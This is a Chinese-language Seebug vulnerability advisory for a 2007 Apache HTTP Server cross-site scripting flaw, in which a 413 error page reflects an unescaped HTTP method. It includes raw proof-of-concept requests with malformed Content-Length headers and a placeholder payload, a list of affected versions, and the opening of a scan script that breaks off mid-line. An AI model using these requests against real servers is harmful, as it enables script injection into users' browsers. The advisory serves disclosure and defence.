Apache HTTP Server 413错误HTTP请求方法跨站脚本漏洞

2007-12-04T00:00:00
ID SSV:2536
Type seebug
Reporter Root
Modified 2007-12-04T00:00:00

Description

Apache HTTP Server是一款非常流行的HTTP服务程序。 Apache HTTP Server处理特殊构建的HTP方法存在输入验证问题,远程攻击者可以利用漏洞进行跨站脚本攻击,获得敏感信息。 通过提交一个畸形的HTTP方法(其可包含恶意负载(如Javascript)和表单中非法长度数据),可引起Apache HTTP服务器返回客户端提供的脚本代码: Two 'Content-length:' headers equals to zero. i.e.: Content-Length: 0[LF]Content-Length: 0 One 'Content-length:' header equals to two values. i.e.: "Content-length: 0, 0" One 'Content-length:' header equals to a negative value. i.e.: "Content-length: -1" One 'Content-length:' header equals to a large value. i.e.: "Content-length: 9999999999999999999999999999999999999999999999" 当提交非法长度数据时Apache 2.X返回'413 Request Entity Too Large'错误,通过服务器返回的错误页上可检测跨站脚本可获得3中可能的字符串矢量: 'Host:'头 URL HTTP方法 如果使用'Host:'和URL头字段检测跨站脚本,Apache会修正三角括弧,使用HTML替代。 REQUEST: GET / HTTP/1.1 Host: <BADCHARS> Connection: close Content-length: -1 [LF] [LF] SERVER'S REPONSE: HTTP/1.1 413 Request Entity Too Large Date: Fri, 30 Nov 2007 12:40:19 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>413 Request Entity Too Large</title> </head><body> <h1>Request Entity Too Large</h1> The requested resource<br />/<br /> does not allow request data with GET requests, or the amount of data provided in the request exceeds the capacity limit. <hr> <address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at &lt;badchars&gt; Port 80</address> </body></html> 注意'<BADCHARS>'使用'&lt;badchars&gt;'替代。 使用URL检测XSS, Apachepache会修正三角括弧,使用HTML替代: REQUEST: GET /<BADCHARS>/ HTTP/1.1 Host: target-domain.foo Connection: close Content-length: -1 [LF] [LF] SERVER'S RESPONSE: HTTP/1.1 413 Request Entity Too Large Date: Fri, 30 Nov 2007 12:41:17 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>413 Request Entity Too Large</title> </head><body> <h1>Request Entity Too Large</h1> The requested resource<br />/&lt;BADCHARS&gt;/<br /> does not allow request data with GET requests, or the amount of data provided in the request exceeds the capacity limit. <hr> <address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address> </body></html> 注意'<BADCHARS>'使用'&lt;badchars&gt;'替代。 而HTTP方法不会,可导致跨站脚本执行: REQUEST: <BADCHARS> / HTTP/1.1 Host: target-domain.foo Connection: close Content-length: -1 [LF] [LF] SERVER'S RESPONSE: HTTP/1.1 413 Request Entity Too Large Date: Fri, 30 Nov 2007 12:42:46 GMT Server: Apache/2.0.55 (Ubuntu) PHP/5.1.6 Connection: close Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>413 Request Entity Too Large</title> </head><body> <h1>Request Entity Too Large</h1> The requested resource<br />/<br /> does not allow request data with <BADCHARS> requests, or the amount of data provided in the request exceeds the capacity limit. <hr> <address>Apache/2.0.55 (Ubuntu) PHP/5.1.6 Server at target-domain.foo Port 80</address> </body></html> 不过此漏洞需要攻击者迫使目标浏览器提交畸形HTTP方法触发。

Apache Software Foundation Apache 2.2.4 Apache Software Foundation Apache 2.2.3 Apache Software Foundation Apache 2.2.2 Apache Software Foundation Apache 2.2 .0 Apache Software Foundation Apache 2.1.8 Apache Software Foundation Apache 2.1.7 Apache Software Foundation Apache 2.1.6 Apache Software Foundation Apache 2.1.5 Apache Software Foundation Apache 2.1.4 Apache Software Foundation Apache 2.1.3 Apache Software Foundation Apache 2.1.2 Apache Software Foundation Apache 2.1.1 Apache Software Foundation Apache 2.1 Apache Software Foundation Apache 2.0.59 Apache Software Foundation Apache 2.0.58 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian Linux 3.1 ppc + Debian Linux 3.1 mipsel + Debian Linux 3.1 mips + Debian Linux 3.1 m68k + Debian Linux 3.1 ia-64 + Debian Linux 3.1 ia-32 + Debian Linux 3.1 hppa + Debian Linux 3.1 arm + Debian Linux 3.1 amd64 + Debian Linux 3.1 alpha + Debian Linux 3.1 Apache Software Foundation Apache 2.0.55 Apache Software Foundation Apache 2.0.54 + Debian Linux 3.1 sparc + Debian Linux 3.1 s/390 + Debian Linux 3.1 ppc + Debian Linux 3.1 mipsel + Debian Linux 3.1 mips + Debian Linux 3.1 m68k + Debian Linux 3.1 ia-64 + Debian Linux 3.1 ia-32 + Debian Linux 3.1 hppa + Debian Linux 3.1 arm + Debian Linux 3.1 amd64 + Debian Linux 3.1 alpha + Debian Linux 3.1 Apache Software Foundation Apache 2.0.53 Apache Software Foundation Apache 2.0.52 + Apple Mac OS X 10.3.6 + Apple Mac OS X 10.2.8 + Apple Mac OS X Server 10.3.6 + Apple Mac OS X Server 10.2.8 + RedHat Desktop 4.0 + RedHat Enterprise Linux WS 4 + RedHat Enterprise Linux ES 4 + RedHat Enterprise Linux AS 4 + Sun Solaris 10 Apache Software Foundation Apache 2.0.51 + RedHat Fedora Core2 + RedHat Fedora Core1 Apache Software Foundation Apache 2.0.50 + MandrakeSoft Linux Mandrake 10.1 x86_64 + MandrakeSoft Linux Mandrake 10.1 Apache Software Foundation Apache 2.0.49 + S.u.S.E. Linux Personal 9.1 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Apache Software Foundation Apache 2.0.48 + MandrakeSoft Linux Mandrake 10.0 AMD64 + MandrakeSoft Linux Mandrake 10.0 + S.u.S.E. Linux 8.1 + S.u.S.E. Linux Personal 9.0 x86_64 + S.u.S.E. Linux Personal 9.0 + S.u.S.E. Linux Personal 8.2 + Trustix Secure Linux 2.1 + Trustix Secure Linux 2.0 Apache Software Foundation Apache 2.0.47 + Apple Mac OS X Server 10.3.5 + Apple Mac OS X Server 10.3.4 + Apple Mac OS X Server 10.3.3 + Apple Mac OS X Server 10.3.2 + Apple Mac OS X Server 10.3.1 + Apple Mac OS X Server 10.3 + Apple Mac OS X Server 10.2.8 + Apple Mac OS X Server 10.2.7 + Apple Mac OS X Server 10.2.6 + Apple Mac OS X Server 10.2.5 + Apple Mac OS X Server 10.2.4 + Apple Mac OS X Server 10.2.3 + Apple Mac OS X Server 10.2.2 + Apple Mac OS X Server 10.2.1 + Apple Mac OS X Server 10.2 + Apple Mac OS X Server 10.1.5 + Apple Mac OS X Server 10.1.4 + Apple Mac OS X Server 10.1.3 + Apple Mac OS X Server 10.1.2 + Apple Mac OS X Server 10.1.1 + Apple Mac OS X Server 10.1 + MandrakeSoft Linux Mandrake 9.2 amd64 + MandrakeSoft Linux Mandrake 9.2 + MandrakeSoft Linux Mandrake 9.1 ppc + MandrakeSoft Linux Mandrake 9.1 Apache Software Foundation Apache 2.0.46 + RedHat Desktop 3.0 + RedHat Enterprise Linux WS 3 + RedHat Enterprise Linux ES 3 + RedHat Enterprise Linux AS 3 + Trustix Secure Linux 2.0

目前没有解决方案提供: <a href=http://www.apache.org/ target=_blank>http://www.apache.org/</a>

                                        
                                            
                                                使用如下脚本可测试服务器是否存在问题:
#!/bin/bash
#&nbsp;PR07-37-scan
if&nbsp;[&nbsp;$#&nbsp;-ne&nbsp;1&nbsp;]
then
echo&nbsp;&quot;$0&nbsp;&lt;hosts-file&gt;&quot;
exit
fi
for&nbsp;i&nbsp;in&nbsp;`cat&nbsp;$1`&lt;b